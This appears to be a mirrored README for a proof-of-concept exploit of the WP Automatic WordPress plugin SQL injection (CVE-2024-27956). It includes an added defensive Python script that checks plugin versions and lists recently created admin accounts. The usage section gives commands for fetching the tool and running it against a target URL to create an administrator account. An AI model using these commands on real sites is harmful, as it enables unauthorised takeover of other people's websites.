## https://sploitus.com/exploit?id=F710B711-62F2-5D59-9A44-84A7FC2E966E
# WP Automatic Plugin SQL Injection Exploit (CVE-2024-27956)



A proof-of-concept exploit for the SQL injection vulnerability in WP Automatic plugin (CVE-2024-27956) affecting WordPress sites.
## Description
This exploit targets a critical unauthenticated SQL injection vulnerability in the WP Automatic plugin (versions < 3.9.2.0) for WordPress. The vulnerability allows attackers to create administrative users and gain full control of vulnerable websites.
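For defenders, the following added example (not part of this repository's code) checks a plugin file header against the 3.9.2.0 threshold stated above and lists administrator accounts registered after a baseline date, since the impact described is creation of administrative users. The header text, the account list (assumed to be an operator-supplied JSON export with `user_login` and `user_registered` fields), the account names and the baseline date are all constructed for illustration.

```python
import json
import re
from datetime import datetime

FIXED_VERSION = (3, 9, 2, 0)  # this page: versions < 3.9.2.0 are affected

def parse_version(text):
    """Turn '3.9.1.3' into a 4-tuple so shorter versions compare correctly."""
    parts = [int(p) for p in re.findall(r"\d+", text)][:4]
    return tuple(parts + [0] * (4 - len(parts)))

def plugin_version(header_text):
    """Read the 'Version:' field from a WordPress plugin file header."""
    m = re.search(r"^[ \t/*#@]*Version:\s*([0-9][0-9.]*)", header_text, re.M | re.I)
    return m.group(1).rstrip(".") if m else None

def is_affected(header_text):
    """True if affected, False if patched, None if no version was found."""
    v = plugin_version(header_text)
    return None if v is None else parse_version(v) < FIXED_VERSION

def admins_since(users_json, baseline):
    """Administrator logins registered at or after the baseline timestamp."""
    fmt = "%Y-%m-%d %H:%M:%S"
    cutoff = datetime.strptime(baseline, fmt)
    return sorted(
        u["user_login"] for u in json.loads(users_json)
        if datetime.strptime(u["user_registered"], fmt) >= cutoff
    )

# Constructed sample inputs (not taken from any real site).
SAMPLE_HEADER = """<?php
/*
 * Plugin Name: WP Automatic
 * Version: 3.9.1.3
 */
"""
SAMPLE_ADMINS = json.dumps([
    {"user_login": "siteowner", "user_registered": "2021-03-02 10:15:00"},
    {"user_login": "newadmin01", "user_registered": "2024-04-20 03:12:44"},
])

if __name__ == "__main__":
    print("affected:", is_affected(SAMPLE_HEADER))
    print("review:", admins_since(SAMPLE_ADMINS, "2024-03-01 00:00:00"))
```

Any account the second function returns that the site owner cannot account for warrants review, whatever the installed plugin version is now.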
## Features
- Automated vulnerability verification
- Admin user creation with configurable credentials
- Automatic strong password generation
- Clean command-line interface
## Installation
```bash
git clone https://github.com/devsec23/CVE-2024-27956.git
cd CVE-2024-27956
pip install -r requirements.txt
```
## Usage
### Basic exploitation:
```bash
python3 exploit.py http://vulnerable-site.com
```
### Custom username and password:
```bash
python3 exploit.py http://vulnerable-site.com -u admin -p P@ssw0rd123
```
### Using a proxy:
```bash
python3 exploit.py http://vulnerable-site.com --proxy http://127.0.0.1:8080
```
## Options
```
positional arguments:
  url                   Target WordPress URL

optional arguments:
  -h, --help            show this help message and exit
  -u USERNAME, --username USERNAME
                        Username for the new admin account
  -p PASSWORD, --password PASSWORD
                        Password for the new admin account
```
## Legal Disclaimer
This tool is provided for **educational and authorized penetration testing purposes only**. The developer is not responsible for any misuse of this software. Always obtain proper authorization before testing any systems.
## License
This project is licensed under the MIT License - see the [LICENSE](LICENSE) file for details.
## References
- [CVE-2024-27956 Details](https://nvd.nist.gov/vuln/detail/CVE-2024-27956)
- [WP Automatic Plugin](https://wordpress.org/plugins/wp-automatic/)
- [WordPress Security Advisory](https://wordpress.org/news/category/security/)